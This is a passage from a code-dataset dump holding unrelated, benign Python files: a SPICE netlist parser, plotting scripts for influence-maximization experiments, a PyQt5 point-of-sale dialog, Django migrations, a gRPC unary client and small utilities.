            lines.append((line, line_number))
        # Pass 2: dispatch element cards on their leading letter
        # (skipping the title line).
        for line, line_number in lines:
            if line_number > 1:
                r_pattern = re.match(r'^R.*', line, re.I)
                c_pattern = re.match(r'^C.*', line, re.I)
                l_pattern = re.match(r'^L.*', line, re.I)
                d_pattern = re.match(r'^D.*', line, re.I)
                mos_pattern = re.match(r'^M.*', line, re.I)
                v_pattern = re.match(r'^V.*', line, re.I)
                ispulse = re.search(r'PULSE', line, re.I)
                i_pattern = re.match(r'^I.*', line, re.I)
                e_pattern = re.match(r'^E.', line, re.I)
                f_pattern = re.match(r'^F.', line, re.I)
                g_pattern = re.match(r'^G.', line, re.I)
                h_pattern = re.match(r'^H.', line, re.I)
                if r_pattern:
                    element = parse_resistor(line, mycircuit)
                elif c_pattern:
                    element = parse_capacitor(line, mycircuit)
                elif l_pattern:
                    element = parse_inductor(line, mycircuit)
                elif d_pattern:
                    element = parse_diode(line, mycircuit)
                    # Diodes and MOSFETs make the circuit nonlinear.
                    mycircuit.has_nonlinear = True
                elif mos_pattern:
                    element = parse_mos(line, mycircuit)
                    mycircuit.has_nonlinear = True
                elif v_pattern:
                    if ispulse:
                        element = parse_v_pulse_src(line, mycircuit)
                    else:
                        element = parse_vsrc(line, mycircuit)
                elif i_pattern:
                    element = parse_isrc(line, mycircuit)
                elif e_pattern:
                    element = parse_vcvs(line, mycircuit)
                elif f_pattern:
                    element = parse_cccs(line, mycircuit)
                elif g_pattern:
                    element = parse_vccs(line, mycircuit)
                elif h_pattern:
                    element = parse_ccvs(line, mycircuit)
                else:
                    element = None
                if element:
                    elements += [element]
    return mycircuit, elements
def parse_resistor(line, mycircuit):
    """Parse an R card: ``Rname n1 n2 value``."""
    tokens = line.split()
    resistor = Element.Resistor(
        name=tokens[0],
        n1=mycircuit.add_node(tokens[1]),
        n2=mycircuit.add_node(tokens[2]),
        value=unit_transform(tokens[3]),
    )
    return [resistor]
def parse_capacitor(line, mycircuit):
    """Parse a C card: ``Cname n1 n2 value [ic]``.

    NOTE(review): ``replace('f', '')`` strips EVERY 'f' from the lowered
    line (including ones inside names or node labels), not just a unit
    suffix — confirm this is intended.
    """
    line_elements = line.lower().replace('f', '').split()
    n1 = mycircuit.add_node(line_elements[1])
    n2 = mycircuit.add_node(line_elements[2])
    value = unit_transform(line_elements[3])
    # Re-scan the raw line for a trailing magnitude as the initial
    # condition; group(4) may match the empty string (falsy), in which
    # case ic stays None.
    pattern = re.match(r'(^C.*) (.*) (.*) ([0-9.]*[FPNUMKGT]?)F?', line, re.I)
    ic = None
    if pattern.group(4):
        ic = unit_transform(pattern.group(4))
    element = Element.Capacitor(name=line_elements[0], n1=n1, n2=n2, value=value, ic=ic)
    return [element]
def parse_inductor(line, mycircuit):
    """Parse an L card: ``Lname n1 n2 value [ic]`` ('h' unit letters are
    stripped before tokenizing)."""
    tokens = line.lower().replace('h', '').split()
    initial = tokens[4] if len(tokens) > 4 else None
    inductor = Element.Inductor(
        name=tokens[0],
        n1=mycircuit.add_node(tokens[1]),
        n2=mycircuit.add_node(tokens[2]),
        value=unit_transform(tokens[3]),
        ic=initial,
    )
    return [inductor]
def parse_diode(line, mycircuit):
    """Parse a D card: ``Dname n1 n2 model area``."""
    tokens = line.split()
    anode = mycircuit.add_node(tokens[1])
    cathode = mycircuit.add_node(tokens[2])
    diode = Element.diode(name=tokens[0], n1=anode, n2=cathode,
                          model=tokens[3], area=tokens[4])
    return [diode]
def parse_mos(line, mycircuit):
    """Parse an M card: ``Mname nd ng ns nb model W=.. L=..``.

    The W= and L= parameters may appear in either order; the letter
    captured in regex groups 7 and 9 decides which value is which.
    """
    line_elements = line.split()
    nd = mycircuit.add_node(line_elements[1])
    ng = mycircuit.add_node(line_elements[2])
    ns = mycircuit.add_node(line_elements[3])
    nb = mycircuit.add_node(line_elements[4])
    model = line_elements[5]
    w = None
    l = None
    pattern = re.match(
        r'(^M.*) (.*) (.*) (.*) (.*) (.*) ([LW])=([0-9.]*[FPNUMKGT]?) ([LW])=([0-9.]*[FPNUMKGT]?)', line, re.I)
    # groups:  1      2    3    4    5    6    7      8               9      10
    if pattern.group(7).lower() == 'w':
        w = unit_transform(pattern.group(8))
    elif pattern.group(7).lower() == 'l':
        l = unit_transform(pattern.group(8))
    if pattern.group(9).lower() == 'w':
        w = unit_transform(pattern.group(10))
    elif pattern.group(9).lower() == 'l':
        l = unit_transform(pattern.group(10))
    element = Element.mos(name=line_elements[0], nd=nd, ng=ng, ns=ns, nb=nb, model=model, w=w, l=l)
    return [element]
def parse_vsrc(line, mycircuit):
    """Parse a V card (independent voltage source).

    AC form: ``Vx n1 n2 AC <magnitude>[V] [<phase>]``
    DC form: ``Vx n1 n2 DC <value>`` / plain 4th token.
    """
    line_elements = line.split()
    dc_value = None
    abs_ac = None
    arg_ac = None
    pattern = re.match(
        r'(^V.*) (.*) (.*) (.*)?', line, re.I)
    n1 = mycircuit.add_node(line_elements[1])
    n2 = mycircuit.add_node(line_elements[2])
    # '=' and ',' separators are normalized to spaces before matching.
    ac_pattern = re.search(
        r'([AD]C) ([0-9.]*[FPNUMKGT]?)V? ([0-9.]*)?', line.replace('=', ' ').replace(',', ' '), re.I)
    if ac_pattern:
        if ac_pattern.group(1).lower() == 'ac':
            abs_ac = unit_transform(ac_pattern.group(2))
            arg_ac = unit_transform(ac_pattern.group(3))
        else:
            # 'DC' keyword: keep the raw 4th token as the DC value.
            # NOTE(review): unlike the AC branch this is NOT passed
            # through unit_transform — confirm downstream expectation.
            dc_value = pattern.group(4)
    element = Element.VSrc(name=line_elements[0], n1=n1, n2=n2,
                           dc_value=dc_value, abs_ac=abs_ac, arg_ac=arg_ac)
    return [element]
def parse_v_pulse_src(line, mycircuit):
    """Parse a PULSE voltage source:
    ``Vx n1 n2 PULSE vlow vhigh delay rise fall width period``.

    Unit letters ('v'/'s') are stripped from each field before the
    magnitude conversion.
    """
    pattern = re.match(r'(^V.*) (.*) (.*) PULSE (.*) (.*) (.*) (.*) (.*) (.*) (.*)', line, re.I)
    # groups:  1      2    3          4    5    6    7    8    9    10
    name = pattern.group(1)
    n1 = mycircuit.add_node(pattern.group(2))
    n2 = mycircuit.add_node(pattern.group(3))
    voltage_low = unit_transform(pattern.group(4).lower().replace('v', ''))
    voltage_high = unit_transform(pattern.group(5).lower().replace('v', ''))
    delay = unit_transform(pattern.group(6).lower().replace('s', ''))
    rise = unit_transform(pattern.group(7).lower().replace('s', ''))
    fall = unit_transform(pattern.group(8).lower().replace('s', ''))
    width = unit_transform(pattern.group(9).lower().replace('s', ''))
    period = unit_transform(pattern.group(10).lower().replace('s', ''))
    element = Element.VPulseSrc(name=name, n1=n1, n2=n2,
                                voltage_low=voltage_low, voltage_high=voltage_high,
                                delay=delay, rise=rise, fall=fall, width=width, period=period)
    return [element]
def parse_isrc(line, mycircuit):
    """Parse an I card (independent current source):
    ``Ix n1 n2 [AC|DC][=] <value>[A][, <extra>]``.
    """
    line_elements = line.split()
    dc_value = None
    ac_value = None
    n1 = mycircuit.add_node(line_elements[1])
    n2 = mycircuit.add_node(line_elements[2])
    pattern = re.match(
        r'(^I.) (.*) (.*) ([AD]C)?(=)?( ?)([0-9.]*[FPNUMKGT]?)A?(,?)( ?)([0-9.]*$)?', line, re.I)
    # groups: 1    2 n1  3 n2  4      5   6   7                8    9   10
    if pattern.group(4):
        # Explicit AC/DC keyword selects the target field.
        if pattern.group(4).lower() == 'dc':
            dc_value = unit_transform(pattern.group(7))
        elif pattern.group(4).lower() == 'ac':
            ac_value = unit_transform(pattern.group(7))
    else:
        # No keyword: treat the magnitude as a DC value.
        dc_value = unit_transform(pattern.group(7))
    element = Element.ISrc(name=line_elements[0], n1=n1, n2=n2, dc_value=dc_value, ac_value=ac_value)
    return [element]
def parse_vcvs(line, mycircuit):
    """Parse an E card (voltage-controlled voltage source):
    ``Ename n1 n2 nc1 nc2 gain``."""
    tokens = line.split()
    out_p, out_n, ctl_p, ctl_n = (mycircuit.add_node(t) for t in tokens[1:5])
    source = Element.ESrc(name=tokens[0], n1=out_p, n2=out_n,
                          nc1=ctl_p, nc2=ctl_n,
                          value=unit_transform(tokens[5]))
    return [source]
def parse_ccvs(line, mycircuit):
    """Parse an H card (current-controlled voltage source):
    ``Hname n1 n2 controlling_source gain``."""
    tokens = line.split()
    source = Element.HSrc(name=tokens[0],
                          n1=mycircuit.add_node(tokens[1]),
                          n2=mycircuit.add_node(tokens[2]),
                          source_name=tokens[3],
                          value=unit_transform(tokens[4]))  # type: HSrc
    return [source]
def parse_vccs(line, mycircuit):
    """Parse a G card (voltage-controlled current source):
    ``Gname n1 n2 nc1 nc2 transconductance``."""
    tokens = line.split()
    out_p, out_n, ctl_p, ctl_n = (mycircuit.add_node(t) for t in tokens[1:5])
    source = Element.GSrc(name=tokens[0], n1=out_p, n2=out_n,
                          nc1=ctl_p, nc2=ctl_n,
                          value=unit_transform(tokens[5]))
    return [source]
def parse_cccs(line, mycircuit):
    """Parse an F card (current-controlled current source):
    ``Fname n1 n2 controlling_source gain``."""
    tokens = line.split()
    source = Element.FSrc(name=tokens[0],
                          n1=mycircuit.add_node(tokens[1]),
                          n2=mycircuit.add_node(tokens[2]),
                          source_name=tokens[3],
                          value=unit_transform(tokens[4]))
    return [source]
def unit_transform(str_value):
    """Convert a SPICE magnitude string (e.g. '10k', '3meg', '2.2u') to float.

    Supported suffixes: f p n u m k meg g t (case-insensitive).

    Bug fix: 'meg' (1e6) was present in the table but unreachable — only
    the final character was inspected, so '3meg' was parsed as 3 * 1e9
    (giga).  The three-letter 'meg' suffix is now checked first.
    """
    unit_dict = {'f': 1e-15, 'p': 1e-12, 'n': 1e-9, 'u': 1e-6, 'm': 1e-3,
                 'k': 1e+3, 'meg': 1e+6, 'g': 1e+9, 't': 1e+12}
    str_value = str_value.lower()
    if str_value.endswith('meg'):
        return float(str_value[:-3]) * unit_dict['meg']
    # Guard against empty input before indexing the last character.
    if str_value and str_value[-1] in 'fpnumkgt':
        return float(float(str_value[:-1]) * unit_dict[str_value[-1]])
    return float(str_value)
def plus_line(file, line):
    """Append SPICE '+' continuation lines from *file* onto *line*.

    Looks ahead one line at a time: a line starting with '+' is joined
    (minus the '+'), anything else rewinds the file position and stops.
    An empty read (EOF) also stops.
    """
    while True:
        mark = file.tell()
        lookahead = file.readline().strip().lower()
        if not lookahead:
            return line
        if lookahead.startswith('+'):
            line += ' ' + lookahead[1:]
        else:
            file.seek(mark)
            return line
|
995,025 | 9876b5cb5f79664eab71c574da2fc920c27f7f53 | import Common.math_functions as mf
import numpy as np
import matplotlib.pylab as plt
# Sample the input range [-5.0, 5.0) in steps of 0.1.
x = np.arange(-5.0, 5.0, 0.1)
#y = pr.step_function(x)
y = mf.sigmoid(x)
plt.plot(x, y)
plt.ylim(-0.1, 1.1)  # pin the y-axis so the sigmoid's 0..1 range is framed
plt.show()
995,026 | 96640a290bf1947c9117e3aad131a68cc47e9cec | # Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""This package contains the core information classes that support asset management applications that deal with the physical and lifecycle aspects of various network resources (as opposed to power system resource models defined in IEC61970::Wires package, which support network applications).
"""
from CIM16.IEC61968.Assets.ProductAssetModel import ProductAssetModel
from CIM16.IEC61968.Assets.AssetModel import AssetModel
from CIM16.IEC61968.Assets.Asset import Asset
from CIM16.IEC61968.Assets.ComMedia import ComMedia
from CIM16.IEC61968.Assets.AssetContainer import AssetContainer
from CIM16.IEC61968.Assets.AssetFunction import AssetFunction
from CIM16.IEC61968.Assets.Seal import Seal
from CIM16.IEC61968.Assets.AssetInfo import AssetInfo
from CIM16.IEC61968.Assets.AcceptanceTest import AcceptanceTest
nsURI = "http://iec.ch/TC57/2013/CIM-schema-cim16#Assets"
nsPrefix = "cimAssets"
class CorporateStandardKind(str):
    """String enumeration of corporate standard kinds.

    Values are: standard, underEvaluation, other, experimental
    """
class SealConditionKind(str):
    """String enumeration of seal conditions.

    Values are: open, broken, other, missing, locked
    """
class SealKind(str):
    """String enumeration of seal kinds.

    Values are: lead, other, steel, lock
    """
class AssetModelUsageKind(str):
    """String enumeration of asset model usage kinds.

    Values are: customerSubstation, transmission, other, substation,
    unknown, distributionOverhead, distributionUnderground, streetlight
    """
|
995,027 | 542ae1aaa46e760daffe1322e74ff73b21f8bdc0 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ui_prot0.ui'
#
# Created by: PyQt5 UI code generator 5.9.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Dialog(object):
    """pyuic5-generated layout for a POS-style dialog (item table,
    totals table, guidance text, choice buttons, image label).

    Do not hand-edit layout geometry here — regenerate from the .ui file
    instead (see the generator warning at the top of this file).
    """
    def setupUi(self, Dialog):
        """Build all widgets on *Dialog* and wire the signal connections."""
        Dialog.setObjectName("Dialog")
        Dialog.resize(676, 581)
        self.buttonBox = QtWidgets.QDialogButtonBox(Dialog)
        self.buttonBox.setGeometry(QtCore.QRect(250, 520, 341, 32))
        self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
        self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
        self.buttonBox.setObjectName("buttonBox")
        self.pushButton = QtWidgets.QPushButton(Dialog)
        self.pushButton.setGeometry(QtCore.QRect(90, 510, 113, 32))
        self.pushButton.setObjectName("pushButton")
        self.pushButton_2 = QtWidgets.QPushButton(Dialog)
        self.pushButton_2.setGeometry(QtCore.QRect(220, 510, 113, 32))
        self.pushButton_2.setObjectName("pushButton_2")
        # Item table: 2 columns (name, price), rows added at runtime.
        self.tableWidget = QtWidgets.QTableWidget(Dialog)
        self.tableWidget.setGeometry(QtCore.QRect(20, 80, 371, 321))
        self.tableWidget.setObjectName("tableWidget")
        self.tableWidget.setColumnCount(2)
        self.tableWidget.setRowCount(0)
        item = QtWidgets.QTableWidgetItem()
        self.tableWidget.setHorizontalHeaderItem(0, item)
        item = QtWidgets.QTableWidgetItem()
        self.tableWidget.setHorizontalHeaderItem(1, item)
        # Totals table: subtotal and grand-total rows.
        self.tableWidget_2 = QtWidgets.QTableWidget(Dialog)
        self.tableWidget_2.setGeometry(QtCore.QRect(20, 410, 371, 91))
        self.tableWidget_2.setObjectName("tableWidget_2")
        self.tableWidget_2.setColumnCount(1)
        self.tableWidget_2.setRowCount(2)
        item = QtWidgets.QTableWidgetItem()
        self.tableWidget_2.setVerticalHeaderItem(0, item)
        item = QtWidgets.QTableWidgetItem()
        self.tableWidget_2.setVerticalHeaderItem(1, item)
        item = QtWidgets.QTableWidgetItem()
        self.tableWidget_2.setHorizontalHeaderItem(0, item)
        item = QtWidgets.QTableWidgetItem()
        self.tableWidget_2.setItem(0, 0, item)
        item = QtWidgets.QTableWidgetItem()
        self.tableWidget_2.setItem(1, 0, item)
        self.textBrowser = QtWidgets.QTextBrowser(Dialog)
        self.textBrowser.setGeometry(QtCore.QRect(50, 20, 391, 41))
        self.textBrowser.setObjectName("textBrowser")
        self.pushButton_3 = QtWidgets.QPushButton(Dialog)
        self.pushButton_3.setGeometry(QtCore.QRect(440, 20, 113, 41))
        self.pushButton_3.setDefault(False)
        self.pushButton_3.setObjectName("pushButton_3")
        self.pushButton_4 = QtWidgets.QPushButton(Dialog)
        self.pushButton_4.setGeometry(QtCore.QRect(550, 20, 113, 41))
        self.pushButton_4.setObjectName("pushButton_4")
        # Image display area (pixmap set at runtime).
        self.label_setPix = QtWidgets.QLabel(Dialog)
        self.label_setPix.setGeometry(QtCore.QRect(400, 80, 250, 250))
        self.label_setPix.setObjectName("label_setPix")

        self.retranslateUi(Dialog)
        # Signal wiring: OK/Cancel, checkout refresh, quit button.
        self.buttonBox.accepted.connect(Dialog.accept)
        self.buttonBox.rejected.connect(Dialog.reject)
        self.pushButton.clicked.connect(self.tableWidget.update)
        self.pushButton.clicked.connect(self.tableWidget.selectAll)
        self.pushButton_2.clicked['bool'].connect(Dialog.reject)
        QtCore.QMetaObject.connectSlotsByName(Dialog)

    def retranslateUi(self, Dialog):
        """Apply all translatable UI strings (Japanese labels)."""
        _translate = QtCore.QCoreApplication.translate
        Dialog.setWindowTitle(_translate("Dialog", "Dialog"))
        self.pushButton.setText(_translate("Dialog", "会計"))
        self.pushButton_2.setText(_translate("Dialog", "終了"))
        item = self.tableWidget.horizontalHeaderItem(0)
        item.setText(_translate("Dialog", "商品名"))
        item = self.tableWidget.horizontalHeaderItem(1)
        item.setText(_translate("Dialog", "金額"))
        item = self.tableWidget_2.verticalHeaderItem(0)
        item.setText(_translate("Dialog", "小計"))
        item = self.tableWidget_2.verticalHeaderItem(1)
        item.setText(_translate("Dialog", "合計"))
        item = self.tableWidget_2.horizontalHeaderItem(0)
        item.setText(_translate("Dialog", "金額"))
        # Sorting is suspended while the totals cells are initialized.
        __sortingEnabled = self.tableWidget_2.isSortingEnabled()
        self.tableWidget_2.setSortingEnabled(False)
        item = self.tableWidget_2.item(0, 0)
        item.setText(_translate("Dialog", "0"))
        item = self.tableWidget_2.item(1, 0)
        item.setText(_translate("Dialog", "0"))
        self.tableWidget_2.setSortingEnabled(__sortingEnabled)
        self.textBrowser.setHtml(_translate("Dialog", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'.SF NS Text\'; font-size:13pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">ここに案内が表示される</p></body></html>"))
        self.pushButton_3.setText(_translate("Dialog", "選択肢A"))
        self.pushButton_3.setShortcut(_translate("Dialog", "Y"))
        self.pushButton_4.setText(_translate("Dialog", "選択肢B"))
        self.pushButton_4.setShortcut(_translate("Dialog", "N"))
        self.label_setPix.setText(_translate("Dialog", "TextLabel"))
|
995,028 | d8dd5ceefe19fe851259a312ad0cb7c791e93060 | import sys
import colors
class ColorPrint(object):
    """Dynamic colored printer (Python 2).

    Attribute access such as ``print_red`` synthesizes a function that
    prints its argument wrapped in the ANSI escape named RED in the
    ``colors`` module; unknown color names degrade to no escape code.
    """
    def __init__(self):
        self.colors = colors

    def __getattr__(self, name):
        # Only print_<color> pseudo-methods are synthesized.
        if not name.startswith('print'):
            raise NameError('%s has no method %s' % (
                self.__module__, name))
        color = name.split('_', 1)[-1]
        return self._get_print_color_method(color)

    def _get_color_str(self, color):
        """Look up the ANSI escape for *color*; '' when unknown."""
        try:
            return getattr(self.colors, color.upper())
        except AttributeError:
            return ''

    def _get_print_color_method(self, color):
        """Build and return the actual printing closure for *color*."""
        def print_(val):
            print '{color}{val}{stop}'.format(
                color=self._get_color_str(color),
                val=val,
                stop=self.colors.COLOR_OFF,
            )
        return print_

# Replace this module object with a ColorPrint instance so callers can do
# ``import colorprint; colorprint.print_red('x')`` directly.
sys.modules[__name__] = ColorPrint()
|
995,029 | 8e57c3348758f09b34258981e409738edea66bc6 | # Generated by Django 3.0 on 2020-01-08 12:08
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add the optional ``install_steps`` text field to Appsblog."""

    dependencies = [
        ('appsblog', '0003_appsblog_features'),
    ]

    operations = [
        migrations.AddField(
            model_name='appsblog',
            name='install_steps',
            field=models.TextField(blank=True),
        ),
    ]
|
995,030 | e590d09a2a220d4f169f5f400457c39c88cd1e26 | import os
# Run the classic three-step build in order: dependency scan, build, install.
for build_step in ("make depend", "make", "make install"):
    os.system(build_step)
|
995,031 | 0774597344afab28a45457aebff87f21aa246f5f | import grpc
import unary.unary_pb2_grpc as pb2_grpc
import unary.unary_pb2 as pb2
class UnaryClient(object):
    """
    Client for accessing the gRPC unary service.
    """
    def __init__(self):
        # Host and port the client connects to (hard-coded local server).
        self.host = 'localhost'
        self.server_port = 50051

        # Instantiate an insecure (plaintext) communication channel.
        self.channel = grpc.insecure_channel(
            '{}:{}'.format(self.host, self.server_port))

        # Bind the client stub to the server channel.
        self.stub = pb2_grpc.UnaryStub(self.channel)

    def get_url(self, message):
        """
        Wrap *message* in a pb2.Message, call the GetServerResponse RPC
        and return the server's reply.
        """
        message = pb2.Message(message=message)
        print(f'{message}')
        return self.stub.GetServerResponse(message)
if __name__ == '__main__':
    # Smoke test: send one message to the local server and show the reply.
    unary_client = UnaryClient()
    reply = unary_client.get_url(message="Hello Server you there?")
    print(f'{reply}')
|
995,032 | ef482e2256ce60f1c5b091f6a525b6dacf8a6ff1 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
    """Localize verbose_name/help_text labels (Persian, as \\u escapes)
    on the participant-result and question scoring fields."""

    dependencies = [
        ('exams', '0037_auto_20150208_2337'),
    ]

    operations = [
        migrations.AlterField(
            model_name='participantresult',
            name='correct',
            field=models.PositiveIntegerField(verbose_name='\u067e\u0627\u0633\u062e \u0647\u0627\u06cc \u0635\u062d\u06cc\u062d'),
            preserve_default=True,
        ),
        migrations.AlterField(
            model_name='participantresult',
            name='score',
            field=models.PositiveIntegerField(verbose_name='Score'),
            preserve_default=True,
        ),
        migrations.AlterField(
            model_name='participantresult',
            name='user',
            field=models.ForeignKey(verbose_name='\u0634\u0631\u06a9\u062a \u06a9\u0646\u0646\u062f\u0647', to=settings.AUTH_USER_MODEL),
            preserve_default=True,
        ),
        migrations.AlterField(
            model_name='participantresult',
            name='wrong',
            field=models.PositiveIntegerField(verbose_name='\u067e\u0627\u0633\u062e \u0647\u0627\u06cc \u063a\u0644\u0637'),
            preserve_default=True,
        ),
        migrations.AlterField(
            model_name='question',
            name='correct_score',
            field=models.PositiveSmallIntegerField(default=4, help_text='\u0645\u06cc\u0632\u0627\u0646 \u0646\u0645\u0631\u0647 \u0627\u06cc \u06a9\u0647 \u0628\u0647 \u0627\u0632\u0627\u06cc \u067e\u0627\u0633\u062e \u062f\u0631\u0633\u062a \u0627\u0636\u0627\u0641\u0647 \u0645\u06cc \u0634\u0648\u062f', verbose_name='\u0627\u0645\u062a\u06cc\u0627\u0632 \u067e\u0627\u0633\u062e \u0635\u062d\u06cc\u062d'),
            preserve_default=True,
        ),
        migrations.AlterField(
            model_name='question',
            name='wrong_penalty',
            field=models.PositiveSmallIntegerField(default=1, help_text='\u0645\u06cc\u0632\u0627\u0646 \u0646\u0645\u0631\u0647 \u0627\u06cc \u06a9\u0647 \u0628\u0647 \u0627\u0632\u0627\u06cc \u067e\u0627\u0633\u062e \u063a\u0644\u0637 \u06a9\u0645 \u0645\u06cc \u0634\u0648\u062f', verbose_name='\u062c\u0631\u06cc\u0645\u0647 \u06cc \u067e\u0627\u0633\u062e \u063a\u0644\u0637'),
            preserve_default=True,
        ),
    ]
995,033 | 02162dcfbd5390a40a7a4517621b3e8d53c62a3d |
import matplotlib.pyplot as plt
import matplotlib as mpl
import pandas as pd
from collections import defaultdict
import numpy as np
from zutils import *
from zcostfunc import *
from zirie import IRIE
# Global matplotlib styling shared by all figures in this module.
mpl.rcParams['font.family'] = 'serif'
plt.rcParams['font.size'] = 16
plt.rcParams['axes.linewidth'] = 1
import logging
def draw_sigma(network):
    """Plot spread of influence vs. number of seeds for every algorithm on
    *network* and save the figure as a PDF.

    Reads ./Test/<network>.csv (one row per algorithm).  Rows with exactly
    10 values are taken as already sampled at k = 5,10,...,48; longer rows
    hold one value per seed count and are sub-sampled at the x positions.
    """
    csv = pd.read_csv('./Test/{}.csv'.format(network), index_col=0, header=0)
    algs = csv.index.tolist()
    # Fixed color/marker per algorithm so plots are consistent across figures.
    draw_config = {
        'CELF++': ['#1B9D77', 'p'],
        'MaxDegree': ['#A6CFE3', 's'],
        'TIM': ['#EF8860', 'v'],
        'StaticGreedy': ['#A2A2A2', '^'],
        'ICT': ['#386BB0', 'o']
    }
    plt.figure(figsize=(10,7))
    plt.grid(linestyle="--")  # dashed background grid
    ax = plt.gca()
    ax.xaxis.set_tick_params(which='major', size=10, width=2, direction='in', top='on')
    ax.xaxis.set_tick_params(which='minor', size=7, width=2, direction='in', top='on')
    ax.yaxis.set_tick_params(which='major', size=10, width=2, direction='in', right='on')
    ax.yaxis.set_tick_params(which='minor', size=7, width=2, direction='in', right='on')
    x = [0, 5, 10, 15, 20, 25, 30, 35, 40, 45, 48]
    for alg in draw_config.keys():
        if alg not in algs:
            continue
        data = csv.loc[alg].tolist()
        arr = x[:]  # copy: the x positions are mutated per algorithm
        if len(data) == 10:
            # Row is already sampled at k = 5..48; drop the k=0 position.
            arr.pop(0)
        else:
            # Sub-sample the per-k row at the plot positions; plot k=1 first.
            data = [data[i] for i in x]
            arr[0] = 1
        plt.plot(arr, data, label=alg, color=draw_config[alg][0], marker=draw_config[alg][1], linewidth=2.5, markersize=10)
    plt.yticks(size=18)
    plt.xticks(size=18)
    ax.set_ylabel('Spread of influence', labelpad=5, size=20)
    ax.set_xlabel('Number of seeds(k)', labelpad=10, size=20)
    plt.legend(fontsize=18)
    # Fixed: raw string so the Windows path's backslashes are never parsed
    # as escape sequences (non-raw '\s' etc. is a deprecated invalid escape).
    plt.savefig(r'D:\latexProject\CSCWD\DrawMax\sigma-{}.pdf'.format(network), dpi=300, transparent=False, bbox_inches='tight')
def draw_runtime():
    """Draw a grouped, log10-scaled bar chart of per-algorithm running time
    on each dataset and save it as a PDF.

    Reads ./Test/runtime.csv where each line is "<algorithm>,<seconds>";
    successive lines for the same algorithm correspond to successive
    datasets.  Algorithms missing values are padded with a negligible
    placeholder so the bar groups stay aligned.
    """
    datasets = ['NetHEPT', 'NetPHY', 'Sina Weibo']
    record = defaultdict(list)
    bar_width = 3
    draw_config = {
        'MaxDegree': ['#9ABBF3', '/'],
        'StaticGreedy': ['#FFFFA2', 'x'],
        'CELF++': ['#C2B2D6', '-'],
        'TIM': ['#9BD59B', "\\"],
        'ICT': ['#FDC897', None]
    }
    # Fixed: use a context manager so the CSV handle is always closed
    # (the original open() was never closed).
    with open('./Test/runtime.csv', 'r') as file:
        for line in file:
            arr = line.strip().split(',')
            alg, val = arr[0], float(arr[1])
            record[alg].append(val)
    # Pad missing datasets with a tiny value so every group has 3 bars.
    for alg in record.keys():
        while len(record[alg]) < len(datasets):
            record[alg].append(10**-9)
    x = np.array([i * 15 + i * 10 for i in range(3)])
    idx = 0
    plt.figure(figsize=(22,14))
    plt.grid(linestyle="--")  # dashed background grid
    ax = plt.gca()
    ax.yaxis.set_tick_params(which='major', size=10, width=2, direction='in', right='on')
    ax.yaxis.set_tick_params(which='minor', size=7, width=2, direction='in', right='on')
    # Annotate each bar with a human-readable duration label.
    def autolabel(rects, labels):
        for rect, label in zip(rects, labels):
            height = rect.get_height()
            if height == 0:
                continue
            plt.text(rect.get_x() - 0.3, 0.1 + height, label, fontsize=20, zorder=11)
    for alg in record.keys():
        data = np.array(record[alg])
        height_label = []
        for d in data:
            # Convert seconds to the largest unit below 60 (s -> m -> h).
            cnt = 0
            while d >= 60:
                d /= 60
                cnt += 1
            unit = 's'
            if cnt == 1:
                unit = 'm'
            elif cnt == 2:
                unit = 'h'
            if d < 0.01:
                label = str(round(d, 3)) + unit
            elif d < 10:
                label = str(round(d, 2)) + unit
            else:
                label = str(round(d, 1)) + unit
            height_label.append(label)
        # Bar height is log10(seconds) shifted by +3 and clipped to [0, 10].
        data = np.log10(data) + 3
        data = np.clip(data, 0, 10)
        autolabel(plt.bar(x + idx * bar_width, data, bar_width, label=alg, color=draw_config[alg][0], hatch=draw_config[alg][1],edgecolor='#000000', zorder=10), height_label)
        idx += 1
    # Tick labels show the real (unshifted) powers of ten.
    y = np.array([i for i in range(-3, 7, 2)])
    ytick = [r'$10^{'+ str(i) +'}$' for i in y]
    plt.xticks(x + bar_width * 5 / 2, datasets, size=28)
    plt.yticks(y + 3, ytick, size=28)
    plt.ylabel('Running time(s)', labelpad=5, size=32)
    plt.xlabel('Datasets', labelpad=10, size=32)
    plt.legend(fontsize=28)
    # Fixed: raw string so the Windows path's backslashes are not escapes.
    plt.savefig(r'D:\latexProject\CSCWD\DrawMax\Runtime.pdf', dpi=300, transparent=False, bbox_inches='tight')
def draw_simulate_predict():
    """Run IRIE on the NetHEPTFix network (k = 1 seed) with the sigmoid
    cost function, in simulate-vs-predict comparison mode."""
    seed_count = 1
    mc = 1000  # Monte-Carlo rounds (currently unused by the IRIE call)
    network_type = "NetHEPTFix"
    # Build an empty graph and load the chosen network into it.
    graph = ZGraph()
    sp_a = load_network(graph, network_type)
    IRIE(seed_count, graph, sp_a, sigmod_func, True)
def draw_cost(network):
